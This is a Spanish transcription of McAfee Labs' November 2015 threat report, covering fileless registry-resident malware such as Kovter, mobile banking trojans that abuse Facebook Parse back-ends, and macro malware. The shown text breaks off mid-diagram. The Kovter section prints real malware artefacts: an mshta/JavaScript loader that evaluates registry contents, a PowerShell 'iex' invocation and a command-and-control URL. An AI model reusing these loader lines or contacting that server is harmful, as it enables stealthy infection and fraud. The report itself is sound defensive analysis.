Informe sobre amenazas de McAfee Labs Noviembre de 2015

Transcripción

Informe
Informe sobre amenazas
de McAfee Labs
Noviembre de 2015
McAfee Labs
contabiliza 327 nuevas
amenazas cada
minuto, o más de
5 cada segundo.
Acerca de McAfee Labs
Introducción
McAfee Labs es uno de los líderes mundiales en
investigación e información sobre amenazas, e innovación
en ciberseguridad. Gracias a la información que recibe de
millones de sensores situados en los principales vectores
de amenazas: archivos, la Web, la mensajería y las redes,
McAfee Labs proporciona información sobre amenazas en
tiempo real, análisis críticos y opiniones de expertos que
permiten mejorar la protección y reducir los riesgos.
En McAfee Labs hemos vivido un otoño de máxima actividad.
McAfee forma ahora parte de Intel Security.
www.mcafee.com/es/mcafee-labs.aspx
Siga a McAfee Labs
En octubre, publicamos el informe El comercio clandestino
de datos, en el que se explica qué ocurre con los datos
robados después de un ataque y se detallan algunos
de los muchos métodos que emplean los ciberladrones
para rentabilizar la información que han robado.
Además, el informe se ilustra con numerosos ejemplos
sobre cómo son estos mercados y documenta el valor
asociado a determinados tipos de datos robados.
En noviembre, publicamos el informe de predicciones sobre
amenazas para 2016 de McAfee Labs. En ese documento
examinamos el futuro desde dos perspectivas diferentes.
■■
■■
Por un lado, entrevistamos a 21 personalidades
destacadas de Intel Security que han compartido
con nosotros su opinión sobre el futuro de las
ciberamenazas, así como su visión sobre la respuesta
que puede dar el sector de la seguridad en los
próximos cinco años. Les invitamos a que miraran
al horizonte para predecir la evolución de los
autores de las amenazas, de sus comportamientos
y objetivos, así como la respuesta del sector desde
el momento actual hasta 2020.
Además, aportamos nuestras previsiones concretas
sobre cuál será la actividad de las amenazas en 2016.
Entre ellas, incluimos el ransomware, los ataques
dirigidos a automóviles o a infraestructuras críticas,
o el almacenamiento y la venta de datos robados.
Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 2
Casi al mismo tiempo, participamos en la elaboración
de un informe de la Cyber Threat Alliance, un grupo de
proveedores líderes de soluciones de ciberseguridad
—entre los que se encuentra Intel Security— que se
han unido con el fin de compartir nuevos datos sobre
amenazas en interés de todos sus clientes.
Lucrative Ransomware Attacks: Analysis of the CryptoWall
Version 3 Threat (Ataques de ramsomware lucrativos:
el análisis de la amenaza CryptoWall versión 3) es el
resultado de meses de un trabajo conjunto de investigación
técnica de Intel Security, Symantec, Palo Alto Networks
y Fortinet. El informe disecciona la familia de la versión
3 del ransomware CryptoWall, que ha reportado a los
delincuentes más de 325 millones de dólares en pagos
a rescates. Todos los miembros de la alianza han puesto en
común la información de amenazas, tácticas e indicadores
detallados en el informe y han compartido estos datos con la
comunidad de código abierto. Creemos que el intercambio de
información es esencial en la industria de la seguridad.
Al mismo tiempo, hemos celebrado cinco sesiones
temáticas; dos sesiones técnicas de perfeccionamiento
y tres sesiones "TurboTalk" en la conferencia de seguridad
FOCUS 15 de Intel Security. En las presentaciones
de McAfee Labs se han tratado temas tan variados
como las tendencias de los ataques avanzados o los
desmantelamientos llevados a cabo por las fuerzas de
seguridad internacionales con la ayuda de McAfee Labs.
Y en otras noticias...
Además de la ingente cantidad de investigaciones
llevadas a cabo por McAfee Labs, desarrollamos también
la tecnología base que forma parte de los productos de
Intel Security. Tenemos el placer de comunicar que en
unas pruebas recientes llevadas a cabo por terceros,
nuestros productos de seguridad de endpoints para
empresas han obtenido la máxima calificación hasta el
momento. Además, la puntuación en cuanto a protección
ha sido perfecta. A estos resultados han contribuido
las mejoras continuas en McAfee GTI (cuya información
sobre amenazas consumen los productos de seguridad
de endpoints para empresas) y la optimización del
rendimiento de los archivos DAT. ¡Nuestro reconocimiento
al equipo de desarrollo de McAfee Labs!
En McAfee Global Threat Intelligence seguimos aprendiendo
sobre los datos y el tráfico. El panel en la nube de McAfee
GTI nos permite ver y analizar los patrones de ataque
del mundo real, lo que sirve después para mejorar la
protección de los clientes. Dicha información ofrece una
idea del volumen de los ataques que sufren nuestros
clientes. Durante el 3.er trimestre, estos fueron los
volúmenes registrados:
■■
■■
Y ahora comenzamos la temporada navideña con la
publicación del informe de McAfee Labs sobre amenazas
de noviembre de 2015. En este informe sobre amenazas
trimestral, destacamos tres temas:
■■
■■
■■
La aparición de una nueva generación de
malware sin archivos, que sortea las medidas
de detección ocultándose en el registro de
Microsoft Windows y eliminando del sistema
de archivos todo rastro de infección.
Cómo las malas prácticas de codificación para
la seguridad en la nube de las aplicaciones
móviles —por ejemplo, el incumplimiento de
las instrucciones del proveedor de servicios de
back-end— pueden poner en riesgo los datos
de los usuarios en la nube.
La reaparición del malware basado en macros,
fundamentalmente a través de sofisticadas
campañas de spam y macros inteligentes que
permanecen ocultas aun después de haber
descargado sus cargas útiles.
Naturalmente, acompañamos estos tres temas con nuestras
habituales estadísticas de las amenazas del trimestre.
Comparta este informe
■■
■■
■■
McAfee GTI recibió de media 44 500 millones
de consultas al día.
Cada hora se realizaron más de 7,4 millones
de intentos (a través del correo electrónico,
búsquedas en el navegador, etc.) para
convencer a nuestros clientes de que se
conectaran a URL peligrosas.
Cada hora las redes de nuestros clientes
estuvieron expuestas a más de 3,5 millones
de archivos infectados.
Cada hora, además, intentaron instalarse
o iniciarse 7,4 millones de programas
potencialmente no deseados.
Cada hora nuestros clientes realizaron
2,2 millones de intentos de conexión
a direcciones IP peligrosas o esas direcciones
intentaron conectarse a las redes de
nuestros clientes.
A través de las encuestas acerca de nuestro informe sobre
amenazas seguimos recibiendo opiniones de nuestros
lectores, que son de gran utilidad para nosotros. Si desea
transmitirnos su opinión sobre este informe, haga clic
aquí para rellenar un cuestionario que le llevará apenas
cinco minutos.
—Vincent Weafer, Vicepresidente primero, McAfee Labs
Índice
Informe de McAfee Labs
sobre amenazas
Noviembre de 2015
En la investigación y redacción de
este informe han participado:
Carlos Castillo
Diwakar Dinkar
Paula Greve
Suriya Natarajan
François Paget
Eric Peterson
Arun Pradeep
Avelino Rico
Craig Schmugar
Rakesh Sharma
Rick Simon
Dan Sommer
Bing Sun
Chong Xu
Resumen ejecutivo
5
Temas principales
7
El malware sin archivos, cada vez más escurridizo
8
Los troyanos bancarios móviles atacan en la nube
16
El regreso del malware basado en macros
34
Estadísticas sobre amenazas
48
Resumen ejecutivo
El malware sin archivos, cada vez más escurridizo
El malware sin archivos elude
la detección a base de reducir
o eliminar el almacenamiento
de archivos binarios en disco.
El más reciente no deja ningún
rastro en el disco, lo que
dificulta su detección.
En los últimos años, los creadores de malware han investigado técnicas nuevas
que les permitan eludir la detección permaneciendo en las capas más profundas
del sistema. También han complicado la detección mediante el endurecimiento
de los ataques con técnicas como el polimorfismo, la implantación de órganos
de vigilancia, la revocación de permisos y otros métodos. Además, últimamente
los creadores diseñan el malware específicamente de manera que pueda utilizar
funciones tales como el Instrumental de administración de Windows (WMI,
Windows Management Instrumentation) y Windows PowerShell, con el fin de
lanzar ataques sin guardar ningún archivo en el disco.
Las infecciones residentes en memoria, que no utilizan archivos, se conocen
en el sector de la seguridad desde hace mucho tiempo. Antes las infecciones
siempre depositaban un pequeño archivo binario en algún lugar del disco, sin
embargo, las nuevas técnicas de evasión que emplea el malware sin archivos —
por ejemplo, Kovter, Powelike y XswKit— no dejan rastro en el disco, por lo que
su detección, que en general se basa precisamente en buscar archivos estáticos
en el disco, resulta más difícil.
Los troyanos bancarios móviles atacan en la nube
Algunos desarrolladores de
aplicaciones móviles no siguen
las directrices de seguridad de
sus proveedores de servicios de
back-end, lo que puede dejar
desprotegida la información
de los clientes ante un ataque.
La seguridad del back-end es
con frecuencia insuficiente,
tanto en aplicaciones móviles
legítimas como en las
portadoras de malware.
Los desarrolladores de aplicaciones móviles dedican la mayor parte de sus
recursos a definir el comportamiento de la aplicación ante el usuario y dejan
a los proveedores de servicios de back-end la gestión de la información
almacenada en la nube.
Si bien es cierto que la mayoría de estos proveedores ofrecen funciones
de seguridad para proteger los datos almacenados en sus infraestructuras,
McAfee Labs, en colaboración con terceros, ha descubierto que la implementación
y la configuración predeterminadas de estos servicios son a menudo inseguras,
lo que podría permitir el acceso no autorizado a los datos almacenados en la nube.
Con ayuda de McAfee Labs, Siegfried Rasthofer de la Technische Universität
de Darmstadt y Eric Bodden de Fraunhofer SIT investigaron a tres importantes
proveedores de servicios de back-end y, tras analizar cerca de 2 millones de
aplicaciones, encontraron 56 millones de conjuntos de datos desprotegidos.
Entre ellos había información confidencial, como nombres completos, direcciones
de correo electrónico, contraseñas, fotografías, transacciones monetarias e incluso
historias médicas, que podía utilizarse, entre otras cosas, para perpetrar robos de
identidad, enviar spam por correo electrónico y distribuir malware.
También invertimos los papeles y nos aprovechamos de las deficientes prácticas
de codificación que utilizaron los delincuentes en la seguridad del back-end.
Analizamos 294 817 aplicaciones móviles cargadas de malware y encontramos
16 que no contaban con la protección suficiente en el back-end. Después
examinamos a fondo dos troyanos bancarios móviles —Android/OpFake
y Android/Marry— para averiguar cómo actúan para robar dinero y datos.
Tras un largo paréntesis, ha
regresado el malware basado
en macros. Las campañas
eficaces distribuyen malware
nuevo e inteligente incluido
en los documentos adjuntos
a sofisticados mensajes de
spam. Las macros permanecen
ocultas incluso después de haber
descargado su carga útil.
En los años 90, los programas de malware basado en macros, como Melissa
y WM.Concept, tuvieron bastante éxito hasta que los desarrolladores de software,
sobre todo Microsoft, tomaron medidas para reducir su efectividad. Ahora, tras
varios años de decadencia, se observa un repunte de las macros maliciosas.
Aunque los usuarios particulares no se ven muy afectados por esta amenaza,
ya que hacen un uso mínimo de las macros, las organizaciones de mayor tamaño
sí las emplean con frecuencia, ya que son programas fáciles de desarrollar
y útiles para las tareas repetitivas. Los desarrolladores de malware basado en
macros emplean técnicas de ingeniería social para que los usuarios de empresas
desprevenidos caigan en la trampa.
Esta nueva generación de malware de macros entra principalmente en las
redes corporativas a través de sofisticadas campañas de spam que hacen uso
de la información recopilada mediante ingeniería social para parecer mensajes
legítimos. Estas nuevas macros son inteligentes y permanecen ocultas aun
después de haber descargado su carga útil.
Temas principales
El malware sin archivos, cada vez
más escurridizo
Los troyanos bancarios móviles
atacan en la nube
El regreso del malware basado
en macros
Compartir opinión
Temas principales
El malware sin archivos, cada vez
más escurridizo
—Arun Pradeep y Suriya Natarajan
Las técnicas de infiltración y persistencia que utiliza el malware cambian
constantemente. En los últimos años, los creadores de malware han investigado
técnicas nuevas que les permitan eludir la detección permaneciendo en las
capas más profundas del sistema. También han complicado la detección
mediante el endurecimiento de los ataques con técnicas como el polimorfismo,
la implantación de órganos de vigilancia, la revocación de permisos y otros
métodos. Además, en los últimos tiempos los creadores diseñan el malware
específicamente de manera que pueda utilizar funciones tales como el
Instrumental de administración de Windows (WMI, Windows Management
Instrumentation) y Windows PowerShell, con el fin de lanzar ataques sin guardar
ningún archivo en el disco.
Las infecciones sin archivos residentes en memoria se conocen en el sector de
la seguridad desde hace mucho tiempo. Aunque en aquel entonces se les dio el
nombre de infecciones "sin archivos", siempre depositaban un pequeño archivo
binario en algún lugar del disco. Sin embargo, las nuevas técnicas de evasión del
malware sin archivos —por ejemplo, Kovter, Powelike y XswKit— no dejan rastro
en el disco, por lo que su detección, que en general se basa precisamente en
buscar archivos estáticos en el disco, resulta más difícil.
El malware sin archivos empezó a extenderse a finales del año 2014 y
principios de 2015. En los primeros tres trimestres de 2015, McAfee Labs
detectó 74 471 muestras de tres familias destacadas de malware sin archivos.
A pesar de que la protección contra algunas de estas nuevas familias ha
reducido el número de muestras, el malware persiste.
Tendencia del malware sin archivos
20 000
18 000
16 000
14 000
12 000
10 000
8000
6000
4000
2000
0
Ene
Feb
Mar
Abr
Mayo
Jun
2015
Jul
Ago
Sep
Oct
Temas principales
Tipos de malware sin archivos
El malware sin archivos es el que infecta un sistema sin dejar ningún rastro de su
ejecución en el disco. Los tres tipos de malware sin archivos más comunes son:
■■
■■
■■
Residente en memoria: este tipo de malware utiliza el espacio en
memoria de un archivo de Windows legítimo. Carga el código en
ese espacio y permanece latente hasta que se reactiva o se accede
a él. Aunque la ejecución tiene lugar dentro del espacio legítimo del
archivo en la memoria, la inicia o reinicia un archivo físico inactivo.
Por consiguiente, este tipo de malware no funciona del todo
sin archivos.
Rootkits: en este caso el malware sin archivos oculta su presencia detrás
de una API de nivel de usuario o kernel. Hay un archivo presente en el
disco, pero está en modo oculto. Tampoco este malware funciona del
todo sin archivos.
Registro de Windows: algunos tipos nuevos de malware sin archivos
residen en el Registro del sistema operativo Windows. Los creadores
del malware se aprovechan de funciones como la caché de vistas en
miniatura de Windows, que almacena imágenes para las miniaturas que
se muestran en el Explorador. La caché de vistas en miniatura actúa
como mecanismo de persistencia para el malware.
Este malware sigue necesitando entrar en el sistema de la víctima a través
de un archivo binario estático. La mayoría emplea el correo electrónico
como vía de entrada. En cuanto el usuario hace clic en el archivo adjunto, el
malware escribe la carga útil completa, una vez cifrada, en un subárbol del
Registro de Windows. Después desaparece del sistema autodestruyéndose.
Los creadores de malware sin archivos han diseñado ingeniosamente las familias
Kovter, Powelike y XswKit para ejecutar ataques desde el Registro de Windows
sin utilizar ningún archivo ni dejar ningún rastro en el sistema de archivos.
Aunque el entorno que debe llevar a cabo estos ataques se prepara ejecutando
código de un archivo, este se autodestruye una vez que el sistema está listo para
la operación maliciosa.
Temas principales
Diagrama genérico de infección de malware sin archivos
Campaña de spam
Dropper
Sitios web
maliciosos
Crea
Ejecuta el Registro
con JavaScript
Entrada del Registro de
caché de miniaturas
Ejecuta
Ejecuta
Powershell
Ejecuta la secuencia
de comandos cifrada
Carga útil
maliciosa
El código malicioso
se ejecuta en la memoria
de procesos legítima
Fuente: McAfee Labs, 2015
Técnicas utilizadas para ocultar infecciones sin archivos
Kovter y Powelike escriben el código JavaScript y la carga útil cifrada en
un subárbol del Registro y eliminan el permiso de usuario de las claves
correspondientes para ocultarse ante los productos de seguridad y las funciones
de verificación de acceso del usuario. Esta familia de malware utiliza dos técnicas
para ser invisible al usuario: el enmascaramiento y el uso de un carácter nulo.
Enmascaramiento: con esta técnica, el malware sin archivos oculta las entradas
del Registro ya sea revocando permisos en la lista de control de acceso (ACL)
o añadiendo un carácter nulo al nombre de valor en el Registro.
Una ACL es una lista de protecciones de seguridad que se aplica a un objeto.
Un objeto puede ser un archivo, un proceso, un evento o cualquier otra cosa
que tenga un descriptor de seguridad. En este caso, la entrada del Registro es
el objeto cuyos permisos revoca el malware en la ACL, con lo que impide que
el usuario se percate del rastro malicioso en el Registro.
Temas principales
Uso de un carácter nulo en un nombre de valor del Registro: una técnica sencilla
pero eficaz que utilizan los creadores de malware y que consiste en incluir uno
o varios caracteres nulos en el nombre de valor del Registro. El Editor del Registro
de Windows no puede mostrar entradas —clave, datos o valor— que contengan
caracteres nulos. El malware escribe todo el archivo cifrado en una clave cuyo
nombre comienza por un carácter nulo. Cuando se accede a la clave que ha
creado el malware, el Editor del Registro muestra el siguiente mensaje de error:
Error cuando se accede a una clave de registro que contiene un carácter nulo.
Ejecución de malware sin archivos
Los creadores de malware sin archivos han elegido cuidadosamente aplicaciones
legítimas del sistema operativo Windows para ejecutar sus archivos binarios.
Dos de estas aplicaciones son Instrumental de administración de Windows
(WMI, Windows Management Instrumentation) y PowerShell:
Instrumental de administración de Windows: es la implementación de
Microsoft de Web-Based Enterprise Management (WBEM), una iniciativa para
desarrollar una tecnología estándar de acceso a la información de gestión en
entornos empresariales. El malware sin archivos puede emplear esta utilidad
de Microsoft para ejecutar código JavaScript malicioso.
PowerShell: Windows PowerShell es un marco para la administración de
configuración y automatización de tareas de Microsoft, formado por un shell de
línea de comandos y el correspondiente lenguaje de secuencia de comandos,
creado en .NET Framework. Se escribe en el Registro una carga útil maliciosa
cifrada con Base64, que después se ejecuta con una secuencia de PowerShell.
A continuación se muestra descifrada una función de malware sin archivos
codificada en una clave del Registro que llama al ejecutable de PowerShell
para procesar el código cifrado de la carga útil.
Ly9oS6=TN25.Run(“C:\\Windows\\System32\\WindowsPowerShell\\
v1.0\\powershell.exe iex $env:csnvjgc”,0,1)
Temas principales
McAfee Labs analiza Kovter
Las familias de malware sin archivos habituales utilizan distintas claves del
Registro autoejecutables para iniciar la infección y almacenar toda su carga útil
en claves personalizadas, normalmente ocultas al usuario. La mayoría de las
variantes de este tipo de malware tienen como fin inyectar código de búsqueda,
efectuar fraudes del clic e identificar información del sistema.
El principal instalador de Kovter crea un entorno para la infección completa.
En el Registro se crea una clave Run con código JavaScript y un nombre de valor
que contiene un carácter nulo. El usuario no puede acceder a nombres de valor
que contengan caracteres nulos.
Nombre de valor del registro que contiene un carácter nulo.
El valor de la clave Run señala a otra clave del Registro que contiene la secuencia
de comandos maliciosa para cargar el órgano de vigilancia y la carga útil.
Este es el valor de la clave del Registro que señala a otra clave de la entrada
HKCU\Software.
mshta javascript:wnd1w7pRy=”X”;yg2=new%20
ActiveXObject(“WScript.Shell”);COlM2JWez=”pKiLSI”;Vr0AD6=yg2.
RegRead(“HKCU\\software\\3cf540da\\
e925fae2”);YJa6FFTM=”0nl0”;eval(Vr0AD6);ASC7rr9Oj=”hAzrr”;
En la siguiente imagen, el código JavaScript de la clave de Registro
HKCU\Software está codificado y alterado.
Carga útil cifrada y código de vigilancia escrito en el registro.
Temas principales
El siguiente código JavaScript es el resultado de una primera clarificación del
código alterado; también contiene código shell con codificación Base64.
Código shell con codificación Base64.
Al descodificar el código shell en Base64 aparece la secuencia de comandos
de PowerShell que ejecuta el código malicioso y la secuencia de comandos
del órgano de vigilancia.
Secuencia de comandos de PowerShell con codificación Base64.
Ejecución de PowerShell
La secuencia de comandos de PowerShell ejecuta el código malicioso en la
memoria de los archivos del sistema legítimos para que pueda permanecer
en el sistema sin ser detectado.
■■
Regsvr32.exe
■■
Svchost.exe
■■
Dllhost.exe
Después de ejecutar el código de PowerShell, el malware establece conexión
con un servidor de control.
■■
hxxp://185.5.250.230/upload.php
A continuación, reúne gran cantidad de información de la máquina host y realiza
una serie de acciones.
■■
■■
Recopila información del sistema, como la versión del sistema
operativo, Service Pack y arquitectura (chipset de 32 o 64 bits).
Comprueba si están presentes .Net Framework, Adobe Flash Player
y la última versión del navegador.
Temas principales
Información del sistema infectado reunida por Kovter
Nombre
Valor
Descripción
Mode
1
Acción que debe
realizarse en el host
UID
5BD39AA1CAF61D76
ID de usuario
OS
Win 7, SP1 IL:3
Versión del SO con
Service Pack
OS bits
x32
Arquitectura del
chipset
V
2.0.3.5
Versión del malware
aff_id
610
ID del nodo afectado
Oslang
ENU
Idioma del SO
GMT
GMT +05:30
Zona horaria
Threads
0
Número de
subprocesos
en ejecución
Online
355
Número de infecciones
activas
Total RAM
2047
Capacidad de la
memoria RAM
Load RAM
0
RAM que ha utilizado
el malware
Free RAM
1404
Espacio libre
disponible en la
memoria RAM
CPU Load
7
Carga de la CPU
Antispyware
Windows Defender
Programa de seguridad
instalado
El código que se ejecuta en la memoria analiza los recursos del sistema y recibe
información dinámica del servidor de control, lo que le permite manipular
el ataque sin afectar al usuario y sin ser detectado. Cuantos más recursos
o potencia tiene la máquina, más tráfico se aprecia en la red.
Kovter también despliega técnicas para eludir a los investigadores de seguridad.
Determina si el host es una máquina virtual o si tiene productos antimalware
y herramientas de supervisión. Entre la información que reúne sobre el host
cabe mencionar:
■■
&antivirus=McAfee VirusScan Enterprise
■■
AntiWireShark
■■
&antidetect=AntiVMware
Temas principales
El malware sin archivos comprueba la presencia de aplicaciones específicas.
Si no las encuentra, las descarga y las instala en el sistema de la víctima.
Descubra cómo puede
protegerle Intel Security
frente a esta amenaza.
■■
.NET Framework
■■
Adobe Flash Player
■■
Última versión de Internet Explorer
Estas aplicaciones son necesarias para poder acceder a sitios web con anuncios
basados en Flash y hacer clic en ellos sin ser detectado.
Una vez evaluado el sistema, Kovter prepara un navegador para rastrear todas las
páginas de un sitio web y hacer clic en todos los anuncios. El servidor de control
abre sobre la marcha los sitios que albergan esos anuncios y hace clic en ellos de
forma aleatoria. Llegado este punto, el sistema infectado se ha transformado en
un "bot de clics" que hace continuamente clics fraudulentos en anuncios.
Ejecución del fraude de clics
Kovter contiene cadenas de búsqueda codificadas que llenan las páginas web
donde se encuentran los anuncios en los que el malware hace clic de forma
aleatoria gracias al código incorporado. El fraude de clics es muy lucrativo para
los agresores, que se aprovechan del sistema publicitario de pago por clic que
consiste en que los anunciantes pagan al editor del sitio web cada vez que se
hace clic en un anuncio. Cuantos más clics, más se dinero ganan los delincuentes.
Pero estos no se detienen aquí: además parecen haber incorporado prácticas
de ransomware. Algunas de las variantes de Kovter analizadas por McAfee Labs
descargaron otras cargas útiles pertenecientes a la familia CryptoWall.
En Kovter no hemos observado robo de información. Aparentemente, su único
objetivo es infiltrarse en el sistema de la víctima y transformarlo en un bot de clics.
Detección y tecnología de seguridad
En general, el malware sin archivos no es detectable a partir de archivos,
carpetas u otros elementos estáticos del sistema atacado, ya que no deja
rastro permanente. Además, con este malware no sirve la detección basada en
procesos, puesto que en la memoria no se ejecutan procesos independientes.
La detección basada en el acceso al Registro a nivel de usuario también
puede resultar inútil porque normalmente este acceso se revoca con el uso de
caracteres nulos en los valores de las claves del Registro. Asimismo, es posible
que el cifrado de los valores de las claves del Registro sea dinámico, por lo que
tampoco surte efecto la detección estática de claves de Registro infectadas.
Como el blanco de la agresión no es ninguna aplicación o vulnerabilidad
específica, las actualizaciones de Windows o los parches de aplicaciones no
impiden que los usuarios sean víctimas de este tipo de ataque.
Si tenemos en cuenta que la fuente de la infección suele ser el correo electrónico
o los sitios web maliciosos, dos de las mejores defensas son la navegación
segura y un uso inteligente del correo electrónico. Las tecnologías de seguridad
del correo electrónico y la Web ayudan a proteger a los usuarios en el vector
inicial de ataque del malware sin archivos, que siempre incluye un archivo
adjunto. Algunas tecnologías de seguridad para endpoints son suficientemente
inteligentes para detectar este tipo de malware. Por último, también parece
prometedora la tecnología basada en el comportamiento.
Para obtener más información sobre cómo detectan el malware sin archivos
los productos de Intel Security, haga clic aquí.
Temas principales
Los troyanos bancarios móviles
atacan en la nube
—Carlos Castillo
Casi todas las aplicaciones móviles están conectadas a Internet, lo que
incrementa la disponibilidad de los datos entre dispositivos y plataformas.
Cuando un dispositivo móvil se estropea o el usuario lo cambia por otro,
normalmente los datos de las aplicaciones pueden recuperarse desde la nube.
Sin embargo, almacenar y administrar los datos de aplicaciones móviles
de manera remota puede llevar tiempo y resultar costoso. En lugar de
centrarse únicamente en el desarrollo de la aplicación propiamente dicha,
los desarrolladores deben dedicar tiempo y dinero a crear y probar el
"back-end" de la aplicación en la nube, lo cual requiere conocimientos
específicos de los lenguajes de bases de datos y servidores.
Datos personales captados por aplicaciones móviles y almacenados en el "back-end".
Fuente: https://www.sit.fraunhofer.de/fileadmin/bilder/presse/appdatathreat_pressebild.jpg
Como respuesta, empresas que operan en Internet como Amazon, Google
y Facebook ofrecen servicios de back-end listos para usar, fáciles de implementar
y con mantenimiento incluido que formalmente se conocen como Backend-asa-Service (BaaS). Estos servicios proporcionan almacenamiento y administración
de datos seguros para aplicaciones móviles y web. Aunque la mayoría de los
proveedores de BaaS ofrecen funciones de seguridad para proteger los datos
almacenados en su infraestructura, McAfee Labs, en colaboración con terceros,
ha descubierto que la implementación y la configuración de esos servicios,
cuando corren a cargo de los desarrolladores de aplicaciones móviles, son
a menudo inseguras, lo que podría permitir el acceso no autorizado a los datos
almacenados en la nube.
En marzo, Siegfried Rasthofer de la Technische Universität de Darmstadt y Eric
Bodden de Fraunhofer SIT, con ayuda de McAfee Labs, investigaron dos millones
de aplicaciones móviles conectadas a tres importantes proveedores de BaaS
(Facebook Parse, CloudMine y Amazon AWS) y hallaron 56 millones de conjuntos
de datos desprotegidos. Los investigadores accedieron a bases de datos en la nube
de varias aplicaciones legítimas y descubrieron información confidencial, como
nombres completos, direcciones de correo electrónico, contraseñas, fotografías,
transacciones monetarias e incluso historias médicas, que podía utilizarse, entre
otras cosas, para perpetrar robos de identidad, enviar spam y distribuir malware.
(En lugar de publicar el nombre de los desarrolladores de estas aplicaciones, los
investigadores se comunicaron con ellos en privado para proteger la información
de los clientes). Aunque los proveedores de BaaS documentan cómo implementar
sus servicios de forma segura, algunos desarrolladores de aplicaciones no
siguieron las directrices de seguridad disponibles.
Temas principales
Por ejemplo, una de las recomendaciones más importantes de los proveedores
de BaaS es utilizar canales diferentes, como interfaces web administrativas, para
realizar cualquier manipulación (por ejemplo, leer, actualizar o borrar registros),
y no emplear la propia aplicación.
En caso contrario, el acceso a los datos solo se protege de forma predeterminada
con una clave "secreta" incorporada a la aplicación cuando se le suministra al
usuario. Por lo tanto, está disponible para cualquier persona con un mínimo
de conocimientos técnicos capaz de extraerla descompilando la aplicación
o realizando una búsqueda de cadenas.
Las claves de usuario codificadas en aplicaciones para móviles pueden ser interceptadas,
por lo que la manipulación de datos en la nube directamente desde las apps puede
conllevar riesgos.
Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf
Los troyanos bancarios móviles no utilizan el BaaS de Facebook Parse
de forma segura
Si las aplicaciones legítimas no siguen las directrices de seguridad de los
proveedores de BaaS, con lo que ponen en peligro millones de registros de
clientes, ¿qué ocurre con las aplicaciones móviles portadoras de malware,
y que utilizan a un proveedor de BaaS para sus servicios de back-end?
¿Es posible que tampoco sigan prácticas de seguridad sólidas y se
expongan por tanto al escrutinio de los investigadores de amenazas?
En julio, en colaboración con Rasthofer y Bodden, McAfee Labs analizó
294 817 aplicaciones móviles cargadas de malware y descubrió que 16 de ellas
se conectaban a instancias de BaaS vulnerables implementadas en Facebook
Parse. McAfee Labs observó que nueve de las aplicaciones podían acceder
a tablas de base de datos en la nube (NewTasks, SmsReceiver y TaskManager),
Temas principales
lo que llevó a los investigadores a la conclusión de que el BaaS se utilizaba
también como servidor de control. Detectamos cinco cuentas afectadas en
Facebook Parse; las utilizaban dos familias de troyanos bancarios móviles
relacionadas entre sí: Android/OpFake y Android/Marry.
Smishing: ataques de phishing
a través de mensajes SMS.
Para comprender cómo utilizan los servicios BaaS estas amenazas y qué
tipo de información se almacena en la nube, descompilamos y analizamos
estadísticamente una variante de la familia de malware Android/OpFake,
menos compleja. La aplicación de malware, probablemente distribuida mediante
ataques de smishing, simula ser un instalador (Установка) de la aplicación
rusa legítima de mensajería instantánea Chat for Friends (Чат для друзей.
ДругВокруг, que es legítima:
Familia Android/OpFake que simula ser una aplicación rusa de mensajería instantánea.
Cuando la aplicación de malware se ejecuta, el usuario ve un mensaje falso que
informa de que la aplicación va a descargarse e instalarse en el dispositivo:
Mensaje falso que muestra Android/OpFake.
Temas principales
Sin embargo, en lugar de hacer lo que indica la interfaz de la aplicación,
el malware oculta el icono en la pantalla inicial y pone en marcha un servicio
en segundo plano que suscribe el dispositivo a las notificaciones de inserción
de Facebook Parse, envía información sobre el dispositivo a Facebook Parse
y a servidores de control tradicionales (no BaaS) y programa una alarma
del sistema:
Suena el
teléfono
Se inicia el
servicio principal
Se ejecuta la app
Canales:
• D-<lddispositivo>
• "Everyone"
• País (ISO SIM)
• "welcome"
Se oculta el icono
Se guarda localmente
la URL del servidor de
control principal
Suscripción a
notificaciones de
inserción de Parse
Se guarda la
información de
instalación de Parse
•
•
•
•
•
•
•
•
Finaliza el
arranque
IMEI
País de SIM
Operador de SIM
Número de teléfono
API
Modelo
is_worked
(verdadero)
• worked_task
(verdadero)
• is_root
Fin
Se ejecutan tareas
asíncronas
Envío de información
del dispositivo al servidor
de control /bn/reg.php
Se programa una
alarma del sistema
•
•
•
•
•
IMEI
País de SIM
Operador de SIM
Saldo
Se ejecuta el receptor
de contenido
cada minuto
Comportamiento de Android/OpFake cuando se ejecuta la aplicación o se inicia el servicio
en segundo plano.
Temas principales
La alarma del sistema se ejecuta cada minuto para comprobar si hay nuevos
comandos que ejecutar tanto en el servidor de control tradicional como en la
tabla NewTasks de Facebook Parse. Una vez ejecutado el comando, la tarea
se almacena en la tabla TaskManager y el registro se actualiza después con
la respuesta:
Alarma del
sistema
Ejecución
de receptor
de contenido
Se consulta la
tabla NewTasks
de Parse por
ID de dispositivo
Tarea de
inserción
•
•
•
•
•
type: de NewTasks
task: tipo y argumentos
hash: identificador
IMEI: id de dispositivo
response: vacía
IMEI==
ID de
dispositivo
No
Fin
Sí
No
Ejecutar
nueva tarea
Si type==
tarea e IMEI==
ID de
dispositivo
Se guarda la tarea
ejecutada en la
tabla TaskManager
Sí
Fin
Activar/
desactivar
Intercept
Sí
Task==
Intercept
No
Android/OpFake obtiene nuevos comandos desde la tabla de Facebook Parse NewTasks.
Temas principales
Además de la tarea "intercept" (activar/desactivar), Android/OpFake puede
ejecutar cualquiera de los comandos siguientes incluidos en la tabla NewTasks
o enviados en una notificación de inserción:
Comandos Android/OpFake
Comando
Acción
SMS
Envía un mensaje de texto al número y con el contenido
indicados en el registro de NewTasks.
USSD
Envía un mensaje USSD con el URI "tel:".
URL
Abre la URL indicada en el registro de NewTasks utilizando
el navegador web predeterminado.
New_server
Guarda localmente la URL del nuevo servidor de control.
Install
Descarga a la tarjeta SD un archivo APK de la URL indicada
en el registro de NewTasks. Si se ha obtenido acceso
root al dispositivo, el malware utilizará privilegios del
administrador para instalar subrepticiamente el APK con
el comando "pm install" como si fuera una aplicación del
sistema. Si no se ha obtenido acceso root al dispositivo,
el malware engañará al usuario para que instale la
aplicación mediante la interfaz de usuario.
Una vez finalizada la tarea, el registro se borra de la tabla NewTasks para evitar
que el comando vuelva a ejecutarse.
Cuando llega un mensaje SMS, Android/OpFake:
■■
Guarda el mensaje en la tabla SmsReceiver de Facebook Parse.
■■
Envía los datos del mensaje al canal de inserción "T" de Facebook Parse.
■■
Si está activado el indicador "intercept", el malware envía el mensaje
(y, si el SMS procede de una empresa como MegaFon, el saldo) al
servidor de control tradicional.
Temas principales
•
•
•
•
from
content
to: imei
type: service/
other
• is_card: si contiene
cc #
• intype: entrante
Se guarda el
mensaje en la
